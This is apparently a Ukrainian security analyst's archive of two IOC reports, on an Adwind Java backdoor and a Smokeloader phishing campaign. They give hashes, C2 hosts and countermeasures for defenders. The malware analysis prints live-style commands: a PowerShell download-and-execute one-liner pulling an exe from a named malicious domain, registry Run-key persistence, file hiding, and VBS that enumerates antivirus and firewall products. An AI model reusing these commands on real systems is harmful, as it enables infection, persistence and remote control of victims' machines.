Archive | 07/02/2018

IOC_Adwind_070218

Доброго вечора, панове.

Сьогодні зранку зафіксовано спробу доставки загрози типу Adwind (Java backdoor).

Ми з ним уже “знайомі”: розибрав у червні 16го, у травні 17го, на початку вересня 17го та 12го жовтня.

В групі ризику – працівники бухгалтерії (ДБО) та користувачі самописного софту якому потрібен JRE.

Рівень загрози для систем на яких встановлено Java Runtimeвисокий.

Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Цього разу примітивно, без обгортки, просто JAR у приєднанні.

Рейтинг приманки на VT jar – 9/60.

Даний клас зразків використовується для збору інформації, виведення облікових даних та віддаленого керування.

Схема атаки:

email > .JAR > %temp%\*.JAR, *.class & *.vbs > %Userprofile%\EALtjyLyxBW\

Маркери IOC:

File name   SKMBT_C02072018.jar
SHA-256        abd38eea774ca43a7df3d4e173b07fcee809e2bb0d9ae6d8fd7021610938e7ce
File size      534.01 KB

При запуску JAR файлу активується процес закріплення в системі:

"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\operator\Desktop\decoded.jar"

– зверніть увагу, в пам’ять системи завантажується оригінальний/дійсний файл Java, шкідливі інструкції подаються через параметр

 

"C:\Program Files\Java\jre7\bin\java.exe" -jar C:\tmp\_0.92849276228029881768736636918737462.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive8012862021299542926.vbs
cscript.exe  C:\tmp\Retrive8012862021299542926.vbs

– виконуючи шкідливий код Java видобуває із Jar архіву низку скриптових файлів необхідних для виконання закріплення в системі

 

"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e

– важливий момент – інструкціями передбачено дублювання запускних файлів JRE з Program Files у каталог %AppData%,

 

"reg" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NjLVawaQVWM /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\EALtjyLyxBW\mvisTvrDYHI.lovyGx\"" /f
=
NjLVawaQVWM   Java(TM) Platform SE binary  Oracle Corporation        c:\users\operator\appdata\roaming\oracle\bin\javaw.exe  21.06.2013 22:05               

– запис у автозавантаження через HCU

"attrib" +h "C:\Users\operator\EALtjyLyxBW\*.*"
"attrib" +h "C:\Users\operator\EALtjyLyxBW"

– приховує свої файли через атрибути файлової системи

 

"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar C:\Users\operator\EALtjyLyxBW\mvisTvrDYHI.lovyGx
"C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe" -jar C:\tmp\_0.482691304425191373098301473738213403.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive5796149169918309765.vbs
cscript.exe  C:\tmp\Retrive5796149169918309765.vbs

– передача керування на файл з інструкціями з каталогу користувача

 

"WMIC" /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List

Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")
For Each objItem in colItems
 With objItem
 WScript.Echo "{""AV"":""" & .displayName & """}"
 End With
Next

Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")
For Each objItem in colItems
 With objItem
 WScript.Echo "{""FIREWALL"":""" & .displayName & """}"
 End With
Next
 

– збір інформації про

  • встановленні драйвери PnP пристроїв
  • антивірусне ПЗ
  • брандмауер

(!) може бути ознакою перевірки віртуального середовища або пошук апаратних ключів чи особливої ознаки (Scada контроллери чи POS пристрої)

Після закріплення в системі Adwind ініціює з’єднання із сервером контролю.

Мережеві IOC:

Мережева активність при інфікуванні – спроба з’єднатися із вузлом в TOR

DNS  102   Standard query response 0xe7ab A vvrhhhnaijyj6s2m[.]onion[.]top A 62.0.58.94

Трафік скомпрометованої системи:

java.exe    2208 TCP   127.0.0.1   49359        127.0.0.1   7777 SYN_SENT                                                                         
java.exe    1592 TCP   127.0.0.1   49362        127.0.0.1   7777 SYN_SENT                                                                         
javaw.exe  1464 TCP   10.0.2.15   49291        185.158.139.39 5017 ESTABLISHED

Що можна було зробити аби уникнути інфікування ?

  1. На системах робота яких не залежить від JRE, цей компонент можна та необхідно видалити – тоді код взагалі не запуститься
  2. Доставку JAR файлу можна було зупинити на рівні поштового шлюзу та proxy серверу (як приклад – Web та Email Gateway)
  3. Запис самого JAR в каталозі користувача можна заборонити відповідним правилом Access Protection
  4. Процес інфікування можна зупинити на початку, якщо застосувати правило заборони створення, запису та зчитування vbs файлів у каталозі %temp% (а краще AppData повністю)
  5. Якщо ж співробітнику потрібна і JRE і JAR файли, правилами AP можна заборонити процесу javaw зчитування та виконання JAR файлів із каталогу користувача – цей підхід теж досить дієвий (що правда тоді краще забороняти запуск і зчитування будь-яких файлів адже через параметр інструкції можуть подаватися з tmp )
  6. У кого наразі немає VSE/ENS із AP можуть деактивувати WSH – це поламає процес інфікування, але файли будуть створені і їх доведеться прибирати в ручному режимі або ж в автоматичному, але за допомогою MAR

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування JAR файлів на рівні каналів передачі Web та Email
  • Інвентаризація встановленого ПЗ і видалення JRE там, де він не є критично потрібним
  • Заборона створення та зчитування/запуску *.JAR, *.VBS з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_060218

Доброго дня, панове.

Вчора було зафіксовано повторну спробу доставки троянського коду типу Smokeloader (Chanitor).

Розсилка на 90% наслідує те, що ми вже бачили 30го числа.

Користувачі захисту кінцевих точок McAfee зверніть увагу як етектується dropper:

Трохи аналітики:

  • Доставка – через обфусковані JS скрипти оболонці RAR
  • Скрипт містить одну чітко вказану адресу, а основна частина записується з чітко заданим іменем файлу
  • Був використаний той же скрипт та ім’я сайту з минулої розсилки
  • Завантаження основної частини відбувається не через WSH, а засобами Powershell
  • Запуск шкідливого коду не потребує прав Адміністратора

Схема атаки:

email > Attach (RAR) > JS > single hardcoded URL > GET > %temp%\63753.exe (минулого разу - 5541.exe)

Маркери IOC:

Приєднання (архів):

File name   сканирование гарантійний лист 05_02_2018.rar
SHA-256        6fde3aba8453cef14486e1446debaa7b19f321d9f1e7965bc8516478e5de905f
File size      77.89 KB

скрипт приманка:

File name   гарантійний лист 05_02_18р.xls.js
SHA-256        1d183616452133674366777206b102d234adf351829f4e5bb89079dd235d7930
File size      18.57 KB

основна частина:

File name   crsse.exe >> 63753.exe
SHA-256        f02281510c40d71893e000b4d1e11327e2eb76e999df23ba6876e7162eae5144
File size      281.5 KB

Мережеві IOC:

завантаження payload – досі активна!

104.31.86.241    enterwords[.]ru   GET /uadoc/crsse.exe HTTP/1.1

трафік скомпрометованої системи – сервер контролю

104.27.140.34    honeyindoc[.]ru  POST / HTTP/1.1  (application/x-www-form-urlencoded)

Активність по процесам:

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

Порівняння деобфускованих команд із розсилки за 30те число:

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\гарантійний лист 05_02_18р.xls.js"

"C:\Windows\System32\cmd.exe" /k set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%%_a2%%_a3% $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\63753.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

powershell  $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\63753.exe';$http_request.open('GET', 'h11p://enterwords[.]ru/uadoc/crsse.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\63753.exe"

C:\Windows\SysWOW64\explorer.exe

Закріплення через HCU

HKEY_USERS\S-1-5-21-136527031-2493574210-1221074019-1000\Software\Microsoft\Windows\CurrentVersion\Run
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона вихідних мережевих зєднань для процесів Powershell
  • Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR